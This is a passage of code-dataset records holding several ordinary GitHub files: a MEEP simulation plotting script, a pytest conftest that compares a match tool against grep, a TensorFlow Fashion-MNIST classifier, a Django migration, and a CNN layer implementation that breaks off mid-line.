{"api_name": "views.SendNotification.as_view", "line_number": 26, "usage_type": "call"}, {"api_name": "views.SendNotification", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "views.UpdateContactUsView.as_view", "line_number": 29, "usage_type": "call"}, {"api_name": "views.UpdateContactUsView", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "views.UpdatePrivacyPolicyView.as_view", "line_number": 31, "usage_type": "call"}, {"api_name": "views.UpdatePrivacyPolicyView", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "views.CreateCoinPlan.as_view", "line_number": 32, "usage_type": "call"}, {"api_name": "views.CreateCoinPlan", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "views.ListCoinPlan.as_view", "line_number": 33, "usage_type": "call"}, {"api_name": "views.ListCoinPlan", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "views.UpdateCoinPlan.as_view", "line_number": 34, "usage_type": "call"}, {"api_name": "views.UpdateCoinPlan", "line_number": 34, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "views.CoinPlanDetail.as_view", "line_number": 35, "usage_type": "call"}, {"api_name": "views.CoinPlanDetail", "line_number": 35, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "views.UserDetail.as_view", "line_number": 36, "usage_type": "call"}, {"api_name": "views.UserDetail", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "views.NotificationCount.as_view", "line_number": 37, "usage_type": "call"}, {"api_name": "views.NotificationCount", "line_number": 37, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "views.ReadNotifications.as_view", "line_number": 39, "usage_type": "call"}, {"api_name": "views.ReadNotifications", "line_number": 39, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "views.CreateUser.as_view", "line_number": 41, "usage_type": "call"}, {"api_name": "views.CreateUser", "line_number": 41, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 42, "usage_type": "call"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 42, "usage_type": "name"}, {"api_name": "django.conf.settings.STATIC_ROOT", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "21991652803", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n \n#ff_homo = np.load(\"data_focus_efield_homo_meep_31456.npy\", allow_pickle=True)\n#ff_inhomo = np.load(\"data_focus_efield_inhomo_meep_31456.npy\", allow_pickle=True)\nff_homo = np.load(\"data_focus_efield_homo_beamed_meep_31456.npy\", allow_pickle=True)\nff_inhomo = np.load(\"data_focus_efield_inhomo_beamed_meep_31456.npy\", allow_pickle=True)\n\nsx = 800\nsy = 1000\npml_thicc = 20.0\nx_pos = np.linspace(0.0, sx / 2.0 - pml_thicc, 40)\n\npower_ratio = []\npower_slice = 100\n\nplt.figure()\n\nrunning_i = 0\n#for j in range(80, 120):\nfor j in range(40, 80):\n\n ts = [time_step / 10.0 for time_step in range(len(ff_homo[j]))] \n #plt.plot(ts, np.array(ff_homo[j]) / 0.1 + j, color=\"red\", alpha=0.5)\n ts = [time_step / 10.0 for time_step in range(len(ff_inhomo[j]))] \n #plt.plot(ts, np.array(ff_inhomo[j]) / 0.1 + j, color=\"blue\", alpha=0.5) \n #plt.show()\n\n fpulse_homo = np.array([ff_homo[j][time_step] if ts[time_step] < 140 + 2000 else 0.0 for time_step in range(len(ts))])\n fpulse_inhomo = np.array([ff_inhomo[j][time_step] if ts[time_step] < 320 + 2000 else 0.0 for time_step in range(len(ts))])\n #plt.plot(ts, np.array(fpulse_homo) / 0.01 + j, color=\"red\", alpha=0.5)\n #plt.plot(ts, np.array(fpulse_inhomo) / 0.01 + j, color=\"blue\", alpha=0.5)\n \n #plt.plot(np.array(ff_homo[j]) / 0.3 + j, color=\"red\", alpha=0.5)\n #plt.plot(np.array(ff_inhomo[j]) / 0.3 + j, color=\"blue\", alpha=0.5)\n \n ff_homo_rfft = np.fft.rfft(fpulse_homo) #ff_homo[j])\n ff_inhomo_rfft = np.fft.rfft(fpulse_inhomo) #ff_inhomo[j])\n\n freqs = np.fft.rfftfreq(len(ff_homo[j]), (ts[1]- ts[0]) / 3.33)\n \n #plt.plot(freqs, 10.0 * np.log10(np.abs(ff_homo_rfft)) + j, color=\"red\", alpha=0.5)\n #plt.plot(freqs, 10.0 * np.log10(np.abs(ff_inhomo_rfft)) + j, color=\"blue\", alpha=0.5)\n plt.plot(10.0 * np.log10(np.abs(ff_homo_rfft)) + j, color=\"red\", alpha=0.5)\n plt.plot(10.0 * np.log10(np.abs(ff_inhomo_rfft)) + j, color=\"blue\", alpha=0.5)\n\n power_ratio += [np.power(np.abs(ff_inhomo_rfft[power_slice]), 2.0) / np.power(np.abs(ff_homo_rfft[power_slice]), 2.0)]\n #power_ratio += [np.sum(np.power(fpulse_inhomo, 2.0)) / np.sum(np.power(fpulse_homo, 2.0))]\n print(power_ratio[-1])\n\n \nplt.figure()\nplt.title(\"Focusing Factor for Isotropic Source in MEEP (@\"+str(int(1000.0*freqs[power_slice]))+\"MHz) and in Ray Tracer\")\nplt.xlabel(\"Distance on Surface from Source [m]\")\nplt.ylabel(\"Focusing Factor: Inhomo. Ice Power / Homo. Ice Power\")\nplt.grid()\nplt.xlim(0.0, 350.0)\nplt.ylim(1.1, 1.4)\nplt.plot(np.flip(x_pos, 0), power_ratio, label=\"MEEP Result\")\nplt.legend()\nplt.show()\n", "repo_name": "dansmithphysics/focusing_study", "sub_path": "plot_meep_result.py", "file_name": "plot_meep_result.py", "file_ext": "py", "file_size_in_byte": 2669, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.load", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.fft.rfft", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.fft.rfft", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.fft.rfftfreq", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 40, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}]} +{"seq_id": "20135948233", "text": "from subprocess import Popen, PIPE\nimport os.path\nimport sys\nimport os\n\nimport py.io\nimport py.path\n\nHERE = os.path.dirname(__file__)\n\n\ndef match_script(*args, input=None, encoding='utf-8'):\n command = (sys.executable, '-m', 'match')\n env = dict(os.environ)\n env['PYTHONPATH'] = HERE + ':' + env.get('PYTHONPATH', '')\n return call_subprocess(command, args, input, encoding, env)\n\ndef match_main(*args, input=None, encoding='utf-8'):\n import match\n return call_function(match.main, args, input, encoding)\n\ndef grep(*args, input=None, encoding='utf-8'):\n return call_subprocess('grep', args, input, encoding)\n\ndef pytest_addoption(parser):\n parser.addoption('--match-script', action='store_true',\n help=\"run the match module as a script (default)\")\n parser.addoption('--match-main', action='store_true',\n help=\"run match.main() in the same interpreter\")\n parser.addoption(\"--grep\", action=\"store_true\",\n help=\"run the tests against grep\")\n parser.addoption(\"--all\", action=\"store_true\",\n help=\"all of the above\")\n\ndef pytest_generate_tests(metafunc):\n if 'call' in metafunc.fixturenames:\n if metafunc.config.option.all:\n funcs = [grep, match_main, match_script]\n else:\n funcs = []\n if metafunc.config.option.match_script:\n funcs.append(match_script)\n if metafunc.config.option.match_main:\n funcs.append(match_main)\n if metafunc.config.option.grep:\n funcs.append(grep)\n if not funcs:\n funcs.append(match_script)\n ids = [f.__name__ for f in funcs]\n metafunc.parametrize(\"call\", funcs, ids=ids)\n\n\ndef call_subprocess(command, args, input=None, encoding='utf-8', env=None):\n \"\"\"Call command with the arguments in args. If the input keyword argument\n is given, send it to stdin. Return a (stdoutdata, stderrdata, returncode)\n tuple.\n\n \"\"\"\n if isinstance(command, str):\n command = (command, )\n command = command\n p = Popen(command + args, stdin=PIPE, stdout=PIPE, stderr=PIPE, env=env)\n if encoding and input is not None:\n input = input.encode(encoding)\n out, err = p.communicate(input)\n if encoding:\n out = out.decode(encoding)\n err = err.decode(encoding)\n return out, err, p.returncode\n\n\ndef call_function(func, args, input=None, encoding='utf-8'):\n \"\"\"Call func with the single argument args and capture stdout/err writes\n while it runs. Ignore SystemExit. If the input keyword argument is given,\n send it to stdin. Return a (stdoutdata, stderrdata, returncode) tuple.\n\n \"\"\"\n tmpdir = py.path.local.mkdtemp()\n in_path = tmpdir.join('in')\n out_path = tmpdir.join('out')\n err_path = tmpdir.join('err')\n\n if input:\n if encoding:\n in_path.write_binary(input.encode(encoding))\n else:\n in_path.write_binary(input)\n else:\n in_path.ensure()\n\n in_capture = py.io.FDCapture(0, in_path.open('rb'), patchsys=True)\n out_capture = py.io.FDCapture(1, out_path.open('wb+'), patchsys=True)\n err_capture = py.io.FDCapture(2, err_path.open('wb+'), patchsys=True)\n\n code = 0\n try:\n func(args)\n except SystemExit as e:\n code = e.code\n\n in_capture.done()\n out_capture.done()\n err_capture.done()\n\n out = out_path.read_binary()\n err = err_path.read_binary()\n if encoding:\n out = out.decode(encoding)\n err = err.decode(encoding)\n\n return out, err, code\n\n", "repo_name": "codebicycle/python-practice-lemon24", "sub_path": "conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 3535, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "match.main", "line_number": 20, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 62, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 62, "usage_type": "name"}, {"api_name": "py.io.path.local.mkdtemp", "line_number": 78, "usage_type": "call"}, {"api_name": "py.io.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "py.io", "line_number": 78, "usage_type": "name"}, {"api_name": "py.io.io.FDCapture", "line_number": 91, "usage_type": "call"}, {"api_name": "py.io.io", "line_number": 91, "usage_type": "attribute"}, {"api_name": "py.io", "line_number": 91, "usage_type": "name"}, {"api_name": "py.io.io.FDCapture", "line_number": 92, "usage_type": "call"}, {"api_name": "py.io.io", "line_number": 92, "usage_type": "attribute"}, {"api_name": "py.io", "line_number": 92, "usage_type": "name"}, {"api_name": "py.io.io.FDCapture", "line_number": 93, "usage_type": "call"}, {"api_name": "py.io.io", "line_number": 93, "usage_type": "attribute"}, {"api_name": "py.io", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "29425424765", "text": "import tensorflow as tf\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n # Funkcja do wypisania wartości\n def plot_image(i, predictions_array, true_label, img):\n true_label, img = true_label[i], img[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n\n plt.imshow(img, cmap=plt.cm.binary)\n\n predicted_label = np.argmax(predictions_array)\n if predicted_label == true_label:\n color = 'blue'\n else:\n color = 'red'\n\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n 100 * np.max(predictions_array),\n class_names[true_label]),\n color=color)\n\n\n # Funkcja do rysowania wykresów wartości plota\n def plot_value_array(i, predictions_array, true_label):\n true_label = true_label[i]\n plt.grid(False)\n plt.xticks(range(10))\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(predictions_array)\n\n thisplot[predicted_label].set_color('red')\n thisplot[true_label].set_color('blue')\n\n\n # Zdefiniowanie bazy danych ciuchow mnist\n fashion_mnist = tf.keras.datasets.fashion_mnist\n\n # Załadowanie zmiennych\n (train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n # Podpis odpowiadający numerom w labels\n class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n # Demonstracja rysunku\n \"\"\"\n plt.figure()\n plt.imshow(train_images[1])\n plt.colorbar()\n plt.grid(False)\n plt.show()\n \"\"\"\n\n # Skalowanie wartości 0-255 do 0-1\n train_images = train_images / 255.0\n test_images = test_images / 255.0\n\n # Demonstracja pierwszych 25 obrazow wraz z ich podpisami\n \"\"\"\n plt.figure(figsize=(10,10))\n for i in range(25):\n plt.subplot(5,5,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(train_images[i], cmap=plt.cm.binary)\n plt.xlabel(class_names[train_labels[i]])\n plt.show()\n \"\"\"\n\n model = tf.keras.Sequential([\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dense(10)\n ])\n\n # Definiowanie optymalizera typu ADAM uczącej sieć\n optimizer = tf.keras.optimizers.Adam(lr=0.001, decay=1e-6)\n\n # Definiowanie funkcji straty wyliczającej błąd\n loss_function = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n\n # Zdefiniowanie pełnego modelu z funkcjami\n model.compile(optimizer=optimizer, loss=loss_function, metrics=['accuracy'])\n\n # Uczenie sieci\n model.fit(train_images, train_labels, epochs=8)\n\n # Sprawdzenie dokladnosci na danych testowych\n test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n\n print('\\nTest accuracy:', test_acc)\n\n # print(model.predict(test_images))\n\n # Zdefiniowanie jednowarstwoej sieci która będzie konwertowała wyniki z modelu za pomocą funkcji SOFTMAX do przedziału (0, 1)\n propability_fn = tf.keras.Sequential([model, tf.keras.layers.Softmax()])\n\n # Predykcja obrazów\n predictions = propability_fn.predict(test_images)\n\n # Wyświetlenie indeksu nawiekszego wyniku\n # np.argmax(predictions[0])\n\n num_rows = 10\n num_cols = 3\n num_img = num_rows * num_cols\n plt.figure(figsize=(2 * 2 * num_cols, 2 * num_rows))\n for i in range(num_img):\n plt.subplot(num_rows, 2 * num_cols, 2 * i + 1)\n plot_image(i, predictions[i], test_labels, test_images)\n plt.subplot(num_rows, 2 * num_cols, 2 * i + 2)\n plot_value_array(i, predictions[i], test_labels)\n plt.tight_layout()\n plt.show()", "repo_name": "NukeeMann/learn_tensorflow", "sub_path": "Basic_image_calssification_2/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3952, "program_lang": "python", "lang": "pl", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.pyplot.grid", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 81, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 104, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Softmax", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}]} +{"seq_id": "33409532586", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('base_app', '0012_auto_20160406_1155'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='HostingPartner',\n fields=[\n ('partner', models.OneToOneField(to='base_app.Partner', serialize=False, primary_key=True)),\n ],\n ),\n ]\n", "repo_name": "rizplate/Loki", "sub_path": "loki/base_app/migrations/0013_hostingpartner.py", "file_name": "0013_hostingpartner.py", "file_ext": "py", "file_size_in_byte": 473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "16225739899", "text": "\"\"\"\nCreated on Aug 26, 2014\n\n@author: Simon Hohberg\n\"\"\"\nimport numpy as np\nimport scipy.signal.signaltools as signal\nimport utils.numpyutils as nputils\n\n\nclass ConvLayer(object):\n \"\"\"\n Convolution layer in a convolutional neural network. When doing feedforward\n this layer convolves the inputs with randomly initialized kernels (filters)\n of the configured size. The number of neurons is the same as the number of\n output feature maps. There is a kernel for each previous feature map (input)\n and feature map of this layer (fully connected).\n \"\"\"\n\n def __init__(self, num_prev_maps, num_maps, kernel_size, activation_func=np.tanh, deriv_activation_func=nputils.tanh_deriv):\n \"\"\"\n Creates a new fully connected convolution layer with a kernel for each\n previous feature map and feature map of this layer resulting in\n num_prev_maps * num_maps kernels plus a bias for each kernel. Kernels\n and biases are randomly initialized in the range [-0.5, 0.5].\n :param num_prev_maps: Number of previous layers' output feature maps\n :param num_maps: Number of output feature maps for this layer, i.e.\n number of neurons\n :param kernel_size: Size of the kernels (filters) to be used for\n convolution\n :param activation_func: Activation function that is used by the neurons\n :param deriv_activation_func: Derivative function for given\n activation function. Calculates the derivative from the activation\n functions outputs.\n \"\"\"\n self.num_prev_maps = num_prev_maps\n self.num_maps = num_maps\n self.kernel_size = kernel_size\n fan_in = np.sqrt(kernel_size * kernel_size * num_prev_maps)\n # kernels/filters for each connection from the previous layer's feature\n # maps to the feature maps of this layer, indexes:\n # [index of feature map in previous layer,\n # index of feature map in this layer, row, column]\n # -> weights[0, 1] is the filter between feature map 0 of the previous\n # layer and feature map 1 of this layer\n self.weights = np.random.uniform(low=-1/fan_in, high=1/fan_in, size=(num_prev_maps, num_maps, kernel_size, kernel_size))\n self.biases = np.zeros(num_maps) # np.random.rand(num_maps)-0.5\n self.activation_func = activation_func\n self.deriv_activation_func = deriv_activation_func\n self.inputs = None\n self.outputs = None\n self.deltas = None\n self.gradients = None\n\n def feedforward(self, inputs):\n \"\"\"\n Calculates output of this layer from the given input.\n :param inputs: 3D or 2D numpy array, if 3D, first dimension: idx of prev\n feature map, second and third dimension: image output of this feature\n map, if 2D just a single image.\n :return 3D numpy array, 2D numpy array output for each feature map\n \"\"\"\n if len(np.shape(inputs)) == 2:\n inputs = np.array([inputs])\n self.inputs = np.copy(inputs)\n in_size = np.shape(self.inputs[0])\n out_shape = (in_size[0] - self.kernel_size + 1, in_size[1] - self.kernel_size + 1)\n self.outputs = np.zeros((self.num_maps, out_shape[0], out_shape[1]))\n # go through all feature maps of this layer\n for fm_idx in range(self.num_maps):\n bias = self.biases[fm_idx]\n conv_out = np.zeros(out_shape)\n # convolve inputs with weights and sum the results\n for prev_fm_idx in range(self.num_prev_maps):\n kernel = self.weights[prev_fm_idx, fm_idx]\n prev_out = self.inputs[prev_fm_idx]\n conv_out += signal.convolve2d(prev_out, kernel, mode='valid')\n # add bias and apply activation function for final output\n self.outputs[fm_idx] = self.activation_func(conv_out + bias)\n if out_shape == (1, 1):\n return np.array([self.outputs[:, 0, 0]])\n return self.outputs\n\n def backpropagate(self, error):\n \"\"\"\n Backpropagation based on given error.\n :param error: Error for this layer (backpropagated error)\n :return Error of the previous layer\n \"\"\"\n if self.outputs is None:\n raise ValueError(\"Feedforward has to be performed before backpropagating!\")\n\n out_size = np.shape(self.outputs[0])\n # has the same size as the input for each previous feature map\n backprop_error = np.zeros((self.num_prev_maps, out_size[0] + self.kernel_size - 1, out_size[1] + self.kernel_size - 1))\n self.deltas = np.zeros((self.num_maps, out_size[0], out_size[1]))\n\n # calculate deltas for this layer\n for fm_idx in range(self.num_maps):\n fm_error = error[fm_idx]\n # calculate deltas for feature map\n # supposing that the derivation function takes the function value as\n # input\n derived_input = self.deriv_activation_func(self.outputs[fm_idx])\n self.deltas[fm_idx] = fm_error * derived_input\n\n # calculate errors for previous layer's feature maps: cross-correlate\n # each feature map's delta with the connection's kernel, the sum over\n # all these correlations (actually only those that have a connection to\n # the previous feature map, here: fully connected) is the delta for the\n # feature map in the previous layer\n for prev_fm_idx in range(self.num_prev_maps):\n for fm_idx in range(self.num_maps):\n # correlate delta with kernel using 'full' mode, to obtain the\n # error for the feature map in the previous layer\n kernel = self.weights[prev_fm_idx, fm_idx]\n # 'full' mode pads the input on all sides with zeros increasing\n # the overall size of the input by kernel_size-1 in both\n # dimensions ( (kernel_size-1)/2 on each side)\n fm_error = signal.correlate2d(self.deltas[fm_idx], kernel, mode='full')\n backprop_error[prev_fm_idx] += fm_error\n return backprop_error\n\n def calc_gradients(self):\n \"\"\"\n Calculate the gradients for the kernels of this layer.\n \"\"\"\n self.gradients = np.zeros((self.num_prev_maps, self.num_maps, self.kernel_size, self.kernel_size))\n for fm_idx in range(self.num_maps):\n for prev_fm_idx in range(self.num_prev_maps):\n prev_fm_output = self.inputs[prev_fm_idx]\n fm_delta = self.deltas[fm_idx]\n kernel = self.weights[prev_fm_idx, fm_idx]\n # the gradient is the product of the delta and the activation.\n # However, here all pixels influenced by a weight have to be\n # considered.\n fm_gradient = nputils.rot180(signal.correlate2d(prev_fm_output, fm_delta, mode='valid'))\n self.gradients[prev_fm_idx, fm_idx] = fm_gradient\n\n def update(self, learning_rate):\n for fm_idx in range(self.num_maps):\n self.biases[fm_idx] -= learning_rate * np.sum(self.deltas[fm_idx])# * np.power(self.kernel_size, 2) * self.num_prev_maps\n for prev_fm_idx in range(self.num_prev_maps):\n fm_gradient = self.gradients[prev_fm_idx, fm_idx]\n self.weights[prev_fm_idx, fm_idx] -= learning_rate * fm_gradient\n\n def set_params(self, params):\n pass\n\nclass MaxPoolLayer(object):\n \"\"\"\n Layer that takes a number of feature maps and applies max-pooling producing\n the same number of feature maps as where fed into this layer when doing\n feedforward.\n \"\"\"\n\n def __init__(self, size, num_maps, activation_func=np.tanh, deriv_activation_func=nputils.tanh_deriv):\n \"\"\"\n Creates a new layer that applies max pooling to each non-overlapping\n size * size square of the given inputs.\n :param size: Size of the square that is used for max pooling\n \"\"\"\n self.size = size\n self.num_maps = num_maps\n self.in_shape = None\n self.weights = np.random.random(num_maps) - 0.5\n self.biases = np.zeros(num_maps)\n self.activation_func = activation_func\n self.deriv_activation_func = deriv_activation_func\n self.output = None\n self.down_in = None\n self.deltas = None\n self.gradients = None\n\n def feedforward(self, inputs):\n \"\"\"\n Applies max-pooling to the given input image with this layer's factor.\n The image is scaled down by this factor.\n :param inputs: 3D numpy array, a number of images that will be\n max-pooled one by one\n :return 3D or 1D numpy array, the same number of images as the input but\n each scaled down by this layer's factor. Output is 1D (row-vector) iff\n the output of a feature map is only a single pixel.\n \"\"\"\n self.in_shape = np.shape(inputs)\n fm_out_shape = (np.ceil(self.in_shape[1] / float(self.size)), np.ceil(self.in_shape[2] / float(self.size)))\n self.down_in = np.zeros((self.num_maps, fm_out_shape[0], fm_out_shape[1]))\n self.output = np.zeros((self.in_shape[0], fm_out_shape[0], fm_out_shape[1]))\n for fm_idx in range(np.shape(inputs)[0]):\n weight = self.weights[fm_idx]\n bias = 